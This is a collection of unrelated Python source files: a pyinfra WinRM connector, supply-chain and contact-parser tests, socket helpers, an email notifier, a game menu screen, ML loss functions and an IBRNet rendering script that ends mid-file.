self.assertEqual(str(exp), output)
def test_Correlation_missing_ydata(self):
"""Test the case where no ydata is given."""
np.random.seed(987654321)
x_input_array = range(1, 101)
self.assertRaises(AttributeError, lambda: Correlation(x_input_array))
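    # API sketch distilled from the tests above: Correlation selects 'pearson'
    # for normal-looking inputs and 'spearman' otherwise, and exposes
    # .r_value/.statistic, .p_value, .test_type, plus the input aliases
    # .xdata/.predictor and .ydata/.response.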
if __name__ == '__main__':
unittest.main()
|
from __future__ import print_function, unicode_literals
import base64
import ntpath
import click
from pyinfra import logger
from pyinfra.api import Config
from pyinfra.api.exceptions import ConnectError, PyinfraError
from pyinfra.api.util import get_file_io, memoize, sha1_hash
from .pyinfrawinrmsession import PyinfraWinrmSession
from .util import make_win_command
def _raise_connect_error(host, message, data):
message = '{0} ({1})'.format(message, data)
raise ConnectError(message)
@memoize
def show_warning():
logger.warning('The @winrm connector is alpha!')
def _make_winrm_kwargs(state, host):
    kwargs = {}
for key, value in (
('username', host.data.winrm_user),
('password', host.data.winrm_password),
('winrm_port', int(host.data.winrm_port or 0)),
('winrm_transport', host.data.winrm_transport or 'plaintext'),
('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30),
('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20),
):
if value:
kwargs[key] = value
# FUTURE: add more auth
# pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp
# see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12
return kwargs
def make_names_data(hostname):
show_warning()
yield '@winrm/{0}'.format(hostname), {'winrm_hostname': hostname}, []
def connect(state, host):
'''
Connect to a single host. Returns the winrm Session if successful.
'''
kwargs = _make_winrm_kwargs(state, host)
logger.debug('Connecting to: %s (%s)', host.name, kwargs)
# Hostname can be provided via winrm config (alias), data, or the hosts name
hostname = kwargs.pop(
'hostname',
host.data.winrm_hostname or host.name,
)
try:
# Create new session
host_and_port = '{}:{}'.format(hostname, host.data.winrm_port)
logger.debug('host_and_port: %s', host_and_port)
session = PyinfraWinrmSession(
host_and_port,
auth=(
kwargs['username'],
kwargs['password'],
),
transport=kwargs['winrm_transport'],
read_timeout_sec=kwargs['winrm_read_timeout_sec'],
operation_timeout_sec=kwargs['winrm_operation_timeout_sec'],
)
return session
# TODO: add exceptions here
except Exception as e:
auth_kwargs = {}
for key, value in kwargs.items():
if key in ('username', 'password'):
auth_kwargs[key] = value
auth_args = ', '.join(
'{0}={1}'.format(key, value)
for key, value in auth_kwargs.items()
)
logger.debug('%s', e)
_raise_connect_error(host, 'Authentication error', auth_args)
def run_shell_command(
state, host, command,
env=None,
success_exit_codes=None,
print_output=False,
print_input=False,
return_combined_output=False,
shell_executable=Config.SHELL,
**ignored_command_kwargs
):
'''
Execute a command on the specified host.
Args:
state (``pyinfra.api.State`` obj): state object for this command
        host: the target host object
        command (string): actual command to execute
        success_exit_codes (list): all values in the list that will return success
        print_output (boolean): print the output
        print_input (boolean): print the input
        return_combined_output (boolean): combine the stdout and stderr lists
        shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell (default)
env (dict): environment variables to set
Returns:
tuple: (exit_code, stdout, stderr)
stdout and stderr are both lists of strings from each buffer.
'''
command = make_win_command(command)
logger.debug('Running command on %s: %s', host.name, command)
if print_input:
click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True)
# get rid of leading/trailing quote
tmp_command = command.strip("'")
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, command),
err=True,
)
if not shell_executable:
shell_executable = 'ps'
logger.debug('shell_executable:%s', shell_executable)
# we use our own subclassed session that allows for env setting from open_shell.
    if shell_executable == 'cmd':
response = host.connection.run_cmd(tmp_command, env=env)
else:
response = host.connection.run_ps(tmp_command, env=env)
return_code = response.status_code
logger.debug('response:%s', response)
std_out_str = response.std_out.decode('utf-8')
std_err_str = response.std_err.decode('utf-8')
# split on '\r\n' (windows newlines)
std_out = std_out_str.split('\r\n')
std_err = std_err_str.split('\r\n')
logger.debug('std_out:%s', std_out)
logger.debug('std_err:%s', std_err)
if print_output:
click.echo(
'{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)),
err=True,
)
if success_exit_codes:
status = return_code in success_exit_codes
else:
status = return_code == 0
logger.debug('Command exit status: %s', status)
if return_combined_output:
std_out = [('stdout', line) for line in std_out]
std_err = [('stderr', line) for line in std_err]
return status, std_out + std_err
return status, std_out, std_err
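# Call-shape sketch (hypothetical state/host objects from a pyinfra run):
#
#     status, stdout, stderr = run_shell_command(state, host, 'Get-Date')
#     status, combined = run_shell_command(
#         state, host, 'Get-Date', return_combined_output=True)
#     # combined -> [('stdout', line), ...] + [('stderr', line), ...]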
def get_file(
state, host, remote_filename, filename_or_io,
**command_kwargs
):
raise PyinfraError('Not implemented')
def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):
# this should work fine on smallish files, but there will be perf issues
# on larger files both due to the full read, the base64 encoding, and
# the latency when sending chunks
with get_file_io(filename_or_io) as file_io:
data = file_io.read()
for i in range(0, len(data), chunk_size):
chunk = data[i:i + chunk_size]
ps = (
'$data = [System.Convert]::FromBase64String("{0}"); '
'{1} -Value $data -Encoding byte -Path "{2}"'
).format(
base64.b64encode(chunk).decode('utf-8'),
'Set-Content' if i == 0 else 'Add-Content',
remote_location)
status, _stdout, stderr = run_shell_command(state, host, ps)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
return True
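# For reference (illustrative path and data): the first chunk of b"hello"
# produces a command shaped like
#     $data = [System.Convert]::FromBase64String("aGVsbG8="); Set-Content -Value $data -Encoding byte -Path "C:\temp\f"
# and later chunks swap Set-Content for Add-Content so each write appends.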
def put_file(
state, host, filename_or_io, remote_filename,
print_output=False, print_input=False,
**command_kwargs
):
'''
Upload file by chunking and sending base64 encoded via winrm
'''
# Always use temp file here in case of failure
temp_file = ntpath.join(
host.fact.windows_temp_dir(),
'pyinfra-{0}'.format(sha1_hash(remote_filename)),
)
if not _put_file(state, host, filename_or_io, temp_file):
return False
    # Move the temp file into place via run_shell_command (passing through command_kwargs)
command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename)
status, _, stderr = run_shell_command(
state, host, command,
print_output=print_output,
print_input=print_input,
**command_kwargs
)
if status is False:
logger.error('File upload error: {0}'.format('\n'.join(stderr)))
return False
if print_output:
click.echo(
'{0}file uploaded: {1}'.format(host.print_prefix, remote_filename),
err=True,
)
return True
EXECUTION_CONNECTOR = True
|
import datetime
from couchdbkit.exceptions import ResourceNotFound
from casexml.apps.stock.consumption import ConsumptionConfiguration
from couchforms.models import XFormInstance
from corehq import Domain
from corehq.apps.accounting import generator
from corehq.apps.commtrack.models import CommtrackConfig, CommtrackActionConfig, StockState, ConsumptionConfig
from corehq.apps.commtrack.tests.util import TEST_BACKEND, make_loc
from corehq.apps.locations.models import Location, SQLLocation, LocationType
from corehq.apps.products.models import Product, SQLProduct
from corehq.apps.sms.backend import test
from corehq.apps.sms.mixin import MobileBackend
from corehq.apps.users.models import CommCareUser
from custom.ewsghana.models import EWSGhanaConfig
from custom.ewsghana.utils import prepare_domain, bootstrap_user
from custom.logistics.test.test_script import TestScript
from casexml.apps.stock.models import StockReport, StockTransaction
from casexml.apps.stock.models import DocDomainMapping
TEST_DOMAIN = 'ewsghana-test'
class EWSScriptTest(TestScript):
def _create_stock_state(self, product, consumption):
xform = XFormInstance.get('test-xform')
loc = Location.by_site_code(TEST_DOMAIN, 'garms')
now = datetime.datetime.utcnow()
report = StockReport(
form_id=xform._id,
date=(now - datetime.timedelta(days=10)).replace(second=0, microsecond=0),
type='balance',
domain=TEST_DOMAIN
)
report.save()
stock_transaction = StockTransaction(
case_id=loc.linked_supply_point().get_id,
product_id=product.get_id,
sql_product=SQLProduct.objects.get(product_id=product.get_id),
section_id='stock',
type='stockonhand',
stock_on_hand=2 * consumption,
report=report
)
stock_transaction.save()
report = StockReport(
form_id=xform._id,
date=now.replace(second=0, microsecond=0),
type='balance',
domain=TEST_DOMAIN
)
report.save()
stock_transaction = StockTransaction(
case_id=loc.linked_supply_point().get_id,
product_id=product.get_id,
sql_product=SQLProduct.objects.get(product_id=product.get_id),
section_id='stock',
type='stockonhand',
stock_on_hand=consumption,
report=report
)
stock_transaction.save()
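        # Note (added): the two balance reports above sit 10 days apart and
        # drop from 2 * consumption to consumption, giving the consumption
        # engine a rate to derive stock state from.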
def setUp(self):
p1 = Product.get_by_code(TEST_DOMAIN, 'mc')
p2 = Product.get_by_code(TEST_DOMAIN, 'lf')
p3 = Product.get_by_code(TEST_DOMAIN, 'mg')
self._create_stock_state(p1, 5)
self._create_stock_state(p2, 10)
self._create_stock_state(p3, 5)
def tearDown(self):
StockTransaction.objects.all().delete()
StockReport.objects.all().delete()
StockState.objects.all().delete()
DocDomainMapping.objects.all().delete()
@classmethod
def setUpClass(cls):
domain = prepare_domain(TEST_DOMAIN)
p = Product(domain=domain.name, name='Jadelle', code='jd', unit='each')
p.save()
p2 = Product(domain=domain.name, name='Male Condom', code='mc', unit='each')
p2.save()
p3 = Product(domain=domain.name, name='Lofem', code='lf', unit='each')
p3.save()
p4 = Product(domain=domain.name, name='Ng', code='ng', unit='each')
p4.save()
p5 = Product(domain=domain.name, name='Micro-G', code='mg', unit='each')
p5.save()
loc = make_loc(code="garms", name="Test RMS", type="Regional Medical Store", domain=domain.name)
test.bootstrap(TEST_BACKEND, to_console=True)
bootstrap_user(username='stella', domain=domain.name, home_loc=loc)
bootstrap_user(username='super', domain=domain.name, home_loc=loc,
phone_number='222222', user_data={'role': 'In Charge'})
try:
XFormInstance.get(docid='test-xform')
except ResourceNotFound:
xform = XFormInstance(_id='test-xform')
xform.save()
sql_location = loc.sql_location
sql_location.products = SQLProduct.objects.filter(product_id=p5.get_id)
sql_location.save()
config = CommtrackConfig.for_domain(domain.name)
config.actions.append(
CommtrackActionConfig(
action='receipts',
keyword='rec',
caption='receipts'
)
)
config.consumption_config = ConsumptionConfig(min_transactions=0, min_window=0, optimal_window=60)
config.save()
@classmethod
def tearDownClass(cls):
MobileBackend.load_by_name(TEST_DOMAIN, TEST_BACKEND).delete()
CommCareUser.get_by_username('stella').delete()
CommCareUser.get_by_username('super').delete()
SQLLocation.objects.all().delete()
LocationType.objects.all().delete()
for product in Product.by_domain(TEST_DOMAIN):
product.delete()
SQLProduct.objects.all().delete()
EWSGhanaConfig.for_domain(TEST_DOMAIN).delete()
DocDomainMapping.objects.all().delete()
Location.by_site_code(TEST_DOMAIN, 'garms').delete()
generator.delete_all_subscriptions()
Domain.get_by_name(TEST_DOMAIN).delete()
def assign_products_to_location():
ng = SQLProduct.objects.get(domain=TEST_DOMAIN, code='ng')
jd = SQLProduct.objects.get(domain=TEST_DOMAIN, code='jd')
mg = SQLProduct.objects.get(domain=TEST_DOMAIN, code='mg')
location = SQLLocation.objects.get(domain=TEST_DOMAIN, site_code='garms')
location.products = [ng, jd, mg]
location.save()
def restore_location_products():
location = SQLLocation.objects.get(domain=TEST_DOMAIN, site_code='garms')
mg = SQLProduct.objects.get(domain=TEST_DOMAIN, code='mg')
location.products = [mg]
location.save()
|
#
# (C) Copyright 2011 Jacek Konieczny <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# pylint: disable-msg=W0201
"""Utility functions to wait until a socket (or object implementing .fileno()
in POSIX) is ready for input or output."""
from __future__ import absolute_import, division
__docformat__ = "restructuredtext en"
import select
if hasattr(select, "poll"):
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLIN)
events = poll.poll(timeout)
return bool(events)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
if timeout is not None:
timeout *= 1000
poll = select.poll()
poll.register(socket, select.POLLOUT)
events = poll.poll(timeout)
return bool(events)
else:
def wait_for_read(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for reading.
"""
readable = select.select([socket], [], [], timeout)[0]
return bool(readable)
def wait_for_write(socket, timeout = None):
"""Wait up to `timeout` seconds until `socket` is ready for writing.
"""
writable = select.select([], [socket], [], timeout)[1]
return bool(writable)
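if __name__ == "__main__":
    # Minimal self-check sketch (not part of the original module); assumes a
    # POSIX socketpair() is available.
    import socket
    sock_a, sock_b = socket.socketpair()
    sock_b.send(b"x")
    print("readable:", wait_for_read(sock_a, 1.0))   # True: one byte is pending
    print("writable:", wait_for_write(sock_b, 1.0))  # True: send buffer has room
    sock_a.close()
    sock_b.close()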
|
# -*- coding: utf-8 -*-
'''
Created on 11 jan. 2017
@author: Fredrick
'''
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Notifier(object):
'''
Sends email notifications.
'''
def __init__(self, args, conf):
'''
Constructor
'''
self.server = conf["EMAIL"]["server"]
self.port = int(conf["EMAIL"]["port"])
self.username = conf["EMAIL"]["username"]
self.password = conf["EMAIL"]["password"]
self.sender = conf["EMAIL"]["sender"]
self.recipient = conf["EMAIL"]["recipient"]
self.siteURL = conf["SITE"]["url"]
self.args = args
def notify(self, count):
""" Send report email """
try:
if (self.args.debug or self.args.verbose):
print("Constructing email...")
msg = MIMEMultipart()
msg['From'] = self.sender
msg['To'] = self.recipient
msg['Subject'] = "MindArk Monitoring System"
body = """A new position at MindArk was found!
Hurry, go there an take a look.""" + self.siteURL
msg.attach(MIMEText(body, 'plain'))
if (self.args.debug or self.args.verbose):
print("Email constructed.")
if (self.args.debug or self.args.verbose):
print("Signing in...")
server = smtplib.SMTP(self.server, self.port)
server.starttls()
server.login(self.username, self.password)
if (self.args.debug or self.args.verbose):
print("Signed in.")
if (self.args.debug or self.args.verbose):
print("Sending email.")
text = msg.as_string()
server.sendmail(self.sender, self.recipient, text)
server.quit()
if (self.args.debug or self.args.verbose):
print("Email sent.")
        except Exception as e:
            if (self.args.debug or self.args.verbose):
                print("Failed to send email:", e)
            return False
return True
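# Usage sketch (hypothetical values; args must expose .debug and .verbose):
#
#     conf = {"EMAIL": {"server": "smtp.example.com", "port": "587",
#                       "username": "user", "password": "secret",
#                       "sender": "[email protected]",
#                       "recipient": "[email protected]"},
#             "SITE": {"url": "https://example.com/careers"}}
#     Notifier(args, conf).notify(1)  # True on success, False on any failure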
|
from galaxdustk.buttons import Button, CircularSelectButton, SelectButton
from galaxdustk.label import Label
from galaxdustk.screen import BaseScreen
import handlers
from gettext import gettext as _
class NewGameScreen(BaseScreen):
background_path = 'data/images/backgrounds/menu.png'
def __init__(self, context):
super(NewGameScreen,self).__init__(context)
screenrect = self.context.screen.get_rect()
        label_species = Label(_('Select your species:'))
label_species.rect.left = 10
label_species.rect.centery = 100
self.sprites.add(label_species)
for x in range(1,4):
specie = CircularSelectButton(self, 'data/images/species/specie%d.png' % x)
specie.rect.left = (label_species.rect.right - 100) + (x*125)
specie.rect.centery = 100
specie.group_id = 1
specie.value = x
self.sprites.add(specie)
label_size = Label(_('Select the galaxy size:'))
label_size.rect.left = 10
label_size.rect.centery = 200
self.sprites.add(label_size)
for galaxy_size in [(1,_('Small')),(2,_('Medium')),(3,_('Big'))]:
size = SelectButton(self, galaxy_size[1], width=100)
size.rect.left = (label_size.rect.right - 100) + (galaxy_size[0]*125)
size.rect.centery = 200
size.group_id = 2
size.value = galaxy_size[0]
self.sprites.add(size)
        label_color = Label(_('Select your color:'))
        label_color.rect.left = 10
        label_color.rect.centery = 300
        self.sprites.add(label_color)
        for player_color in [(1,_('Red'), (255,0,0)),(2,_('Green'), (0,255,0)),(3,_('Blue'), (0,0,255))]:
            one_color = SelectButton(self, player_color[1], width=100)
            one_color.rect.left = (label_color.rect.right - 100) + (player_color[0]*125)
one_color.rect.centery = 300
one_color.group_id = 3
one_color.value = player_color[2]
self.sprites.add(one_color)
begin_game = Button(self, _("Begin the game"))
begin_game.rect.right = screenrect.right - 10
begin_game.rect.bottom = screenrect.bottom - 10
begin_game.connect("clicked", handlers.startgame)
self.sprites.add(begin_game)
back = Button(self, _("Back"))
back.rect.left = screenrect.left + 10
back.rect.bottom = screenrect.bottom - 10
back.connect("clicked", handlers.go_to_menu)
self.sprites.add(back)
|
"""Table of Contents
-modified_huber
-hinge
-squared_hinge
-log
-squared
-huber
-epsilon_insensitive
-squared_epislon_insensitive
-alpha_huber
-absolute
"""
import numpy as np
def modified_huber(p, y):
"""Modified Huber loss for binary classification with y in {-1, 1}; equivalent to quadratically smoothed SVM with gamma = 2
"""
z = p * y
loss = -4.0 * z
idx = z >= -1.0
loss[idx] = (z[idx] - 1.0) ** 2
loss[z >= 1.0] = 0.0
return loss
def hinge(p, y, threshold=1.0):
"""Hinge loss for binary classification tasks with y in {-1,1}
Parameters
----------
threshold : float > 0.0
Margin threshold. When threshold=1.0, one gets the loss used by SVM.
When threshold=0.0, one gets the loss used by the Perceptron.
"""
z = p * y
loss = threshold - z
loss[loss < 0] = 0.0
return loss
def squared_hinge(p, y, threshold=1.0):
"""Squared Hinge loss for binary classification tasks with y in {-1,1}
Parameters
----------
threshold : float > 0.0
Margin threshold. When threshold=1.0, one gets the loss used by
(quadratically penalized) SVM.
"""
return hinge(p, y, threshold) ** 2
def log(p, y):
"""Logistic regression loss for binary classification with y in {-1, 1}"""
z = p * y
return np.log(1.0 + np.exp(-z))
def squared(p, y):
"""Squared loss traditional used in linear regression."""
return 0.5 * (p - y) ** 2
def huber(p, y, epsilon=0.1):
"""Huber regression loss
    Variant of the SquaredLoss that is robust to outliers (quadratic near zero,
    linear for large errors).
http://en.wikipedia.org/wiki/Huber_Loss_Function
"""
abs_r = np.abs(p - y)
loss = 0.5 * abs_r ** 2
    # linear penalty for residuals larger than epsilon
    idx = abs_r > epsilon
    loss[idx] = epsilon * abs_r[idx] - 0.5 * epsilon ** 2
return loss
def epsilon_insensitive(p, y, epsilon=0.1):
"""Epsilon-Insensitive loss (used by SVR).
loss = max(0, |y - p| - epsilon)
"""
loss = np.abs(y - p) - epsilon
loss[loss < 0.0] = 0.0
return loss
def squared_epsilon_insensitive(p, y, epsilon=0.1):
    """Squared epsilon-insensitive loss.
    loss = max(0, |y - p| - epsilon)^2
    """
return epsilon_insensitive(p, y, epsilon) ** 2
def alpha_huber(p, y, alpha=0.9):
    """Huber loss with epsilon set to the alpha-percentile of the absolute
    residuals.
    """
    abs_r = np.abs(p - y)
    loss = 0.5 * abs_r ** 2
    # threshold on the absolute residuals, per the docstring
    epsilon = np.percentile(abs_r, alpha * 100)
    # linear penalty for residuals larger than epsilon
    idx = abs_r > epsilon
    loss[idx] = epsilon * abs_r[idx] - 0.5 * epsilon ** 2
return loss
def absolute(p, y):
""" absolute value of loss
"""
return np.abs(p - y)
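# Minimal usage sketch (an illustration added here, not part of the original
# module): evaluates a few of the losses above on toy data.
if __name__ == '__main__':
    p = np.array([0.5, -1.2, 2.0])  # raw model scores
    y = np.array([1, -1, 1])        # binary labels in {-1, 1}
    print('hinge:         ', hinge(p, y))
    print('modified_huber:', modified_huber(p, y))
    print('log:           ', log(p, y))
    # regression-style losses compare predictions against real-valued targets
    t = np.array([0.4, -1.0, 1.5])
    print('huber:         ', huber(p, t, epsilon=0.5))
    print('absolute:      ', absolute(p, t))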
|
from os import path
from go.vumitools.tests.helpers import djangotest_imports
parser_classes = ['CSVFileParser', 'XLSFileParser']
with djangotest_imports(globals(), dummy_classes=parser_classes):
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from go.base.tests.helpers import GoDjangoTestCase
from go.contacts.parsers import ContactParserException
from go.contacts.parsers.csv_parser import CSVFileParser
from go.contacts.parsers.xls_parser import XLSFileParser
class ParserTestCase(GoDjangoTestCase):
def setUp(self):
self.parser = self.PARSER_CLASS()
def fixture(self, fixture_name):
fixture_path = path.join(settings.PROJECT_ROOT, 'base', 'fixtures',
fixture_name)
        with open(fixture_path, 'r') as fixture_fp:
            content_file = ContentFile(fixture_fp.read())
fpath = default_storage.save('tmp/%s' % (fixture_name,), content_file)
self.add_cleanup(default_storage.delete, fpath)
return fpath
class TestCSVParser(ParserTestCase):
PARSER_CLASS = CSVFileParser
def test_guess_headers_and_row_without_headers(self):
csv_file = self.fixture('sample-contacts.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'name': 'Name 1',
'surname': 'Surname 1',
'msisdn': '+27761234561',
})
def test_guess_headers_and_row_with_key_header(self):
csv_file = self.fixture('sample-contacts-with-key-header.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {
'key': 'foo',
'surname': 'Surname 1',
})
def test_guess_headers_and_row_one_column_with_plus(self):
csv_file = self.fixture('sample-contacts-one-column-with-plus.csv')
data = self.parser.guess_headers_and_row(csv_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
self.assertEqual(sample_row, {'msisdn': '+27761234561'})
def test_contacts_parsing(self):
csv_file = self.fixture('sample-contacts-with-headers.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'surname': 'Surname 2',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_none_entries(self):
csv_file = self.fixture('sample-contacts-with-headers-and-none.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_missing_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-missing-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: not enough fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
def test_contacts_with_extra_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-extra-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: too many fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
class TestXLSParser(ParserTestCase):
PARSER_CLASS = XLSFileParser
def test_guess_headers_and_row_without_headers(self):
xls_file = self.fixture('sample-contacts.xls')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertTrue('mathare-kiamaiko' in known_headers)
self.assertTrue('baba dogo' in known_headers)
self.assertTrue('mathare-kiamaiko' in sample_row)
self.assertTrue('baba dogo' in sample_row)
def test_contacts_parsing(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
contacts = list(self.parser.parse_file(xls_file, zip(
['name', 'surname', 'msisdn'],
['string', 'integer', 'number']), has_header=True))
self.assertEqual(contacts[0], {
'msisdn': '1.0',
'surname': '2',
'name': 'xxx'})
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
# explicit imports for names otherwise only pulled in via `from utils import *`
import os
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
import imageio
from config import config_parser
from ibrnet.sample_ray import RaySamplerSingleImage
from ibrnet.render_image import render_single_image
from ibrnet.model import IBRNetModel
from utils import *
from ibrnet.projection import Projector
from ibrnet.data_loaders import get_nearest_pose_ids
from ibrnet.data_loaders.llff_data_utils import load_llff_data, batch_parse_llff_poses
import time
class LLFFRenderDataset(Dataset):
def __init__(self, args,
scenes='fern', # 'fern', 'flower', 'fortress', 'horns', 'leaves', 'orchids', 'room', 'trex'
**kwargs):
self.folder_path = os.path.join(args.rootdir, 'data/nerf_llff_data/')
self.num_source_views = args.num_source_views
print("loading {} for rendering".format(scenes))
self.render_rgb_files = []
self.render_intrinsics = []
self.render_poses = []
self.render_train_set_ids = []
self.render_depth_range = []
self.h = []
self.w = []
self.train_intrinsics = []
self.train_poses = []
self.train_rgb_files = []
for i, scene in enumerate(scenes):
scene_path = os.path.join(self.folder_path, scene)
_, poses, bds, render_poses, i_test, rgb_files = load_llff_data(scene_path, load_imgs=False, factor=4)
near_depth = np.min(bds)
far_depth = np.max(bds)
intrinsics, c2w_mats = batch_parse_llff_poses(poses)
h, w = poses[0][:2, -1]
render_intrinsics, render_c2w_mats = batch_parse_llff_poses(render_poses)
i_test = [i_test]
i_val = i_test
i_train = np.array([i for i in np.arange(len(rgb_files)) if
(i not in i_test and i not in i_val)])
self.train_intrinsics.append(intrinsics[i_train])
self.train_poses.append(c2w_mats[i_train])
self.train_rgb_files.append(np.array(rgb_files)[i_train].tolist())
num_render = len(render_intrinsics)
self.render_intrinsics.extend([intrinsics_ for intrinsics_ in render_intrinsics])
self.render_poses.extend([c2w_mat for c2w_mat in render_c2w_mats])
self.render_depth_range.extend([[near_depth, far_depth]]*num_render)
self.render_train_set_ids.extend([i]*num_render)
self.h.extend([int(h)]*num_render)
self.w.extend([int(w)]*num_render)
def __len__(self):
return len(self.render_poses)
def __getitem__(self, idx):
render_pose = self.render_poses[idx]
intrinsics = self.render_intrinsics[idx]
depth_range = self.render_depth_range[idx]
train_set_id = self.render_train_set_ids[idx]
train_rgb_files = self.train_rgb_files[train_set_id]
train_poses = self.train_poses[train_set_id]
train_intrinsics = self.train_intrinsics[train_set_id]
h, w = self.h[idx], self.w[idx]
camera = np.concatenate(([h, w], intrinsics.flatten(),
render_pose.flatten())).astype(np.float32)
id_render = -1
nearest_pose_ids = get_nearest_pose_ids(render_pose,
train_poses,
self.num_source_views,
tar_id=id_render,
angular_dist_method='dist')
src_rgbs = []
src_cameras = []
for id in nearest_pose_ids:
src_rgb = imageio.imread(train_rgb_files[id]).astype(np.float32) / 255.
train_pose = train_poses[id]
train_intrinsics_ = train_intrinsics[id]
src_rgbs.append(src_rgb)
img_size = src_rgb.shape[:2]
src_camera = np.concatenate((list(img_size), train_intrinsics_.flatten(),
train_pose.flatten())).astype(np.float32)
src_cameras.append(src_camera)
src_rgbs = np.stack(src_rgbs, axis=0)
src_cameras = np.stack(src_cameras, axis=0)
depth_range = torch.tensor([depth_range[0] * 0.9, depth_range[1] * 1.5])
return {'camera': torch.from_numpy(camera),
'rgb_path': '',
'src_rgbs': torch.from_numpy(src_rgbs[..., :3]),
'src_cameras': torch.from_numpy(src_cameras),
'depth_range': depth_range
}
if __name__ == '__main__':
parser = config_parser()
args = parser.parse_args()
args.distributed = False
# Create ibrnet model
model = IBRNetModel(args, load_scheduler=False, load_opt=False)
eval_dataset_name = args.eval_dataset
extra_out_dir = '{}/{}'.format(eval_dataset_name, args.expname)
print('saving results to {}...'.format(extra_out_dir))
os.makedirs(extra_out_dir, exist_ok=True)
projector = Projector(device='cuda:0')
assert len(args.eval_scenes) == 1, "only accept single scene"
scene_name = args.eval_scenes[0]
out_scene_dir = os.path.join(extra_out_dir, '{}_{:06d}'.format(scene_name, model.start_step), 'videos')
print('saving results to {}'.format(out_scene_dir))
os.makedirs(out_scene_dir, exist_ok=True)
test_dataset = LLFFRenderDataset(args, scenes=args.eval_scenes)
save_prefix = scene_name
test_loader = DataLoader(test_dataset, batch_size=1)
total_num = len(test_loader)
out_frames = []
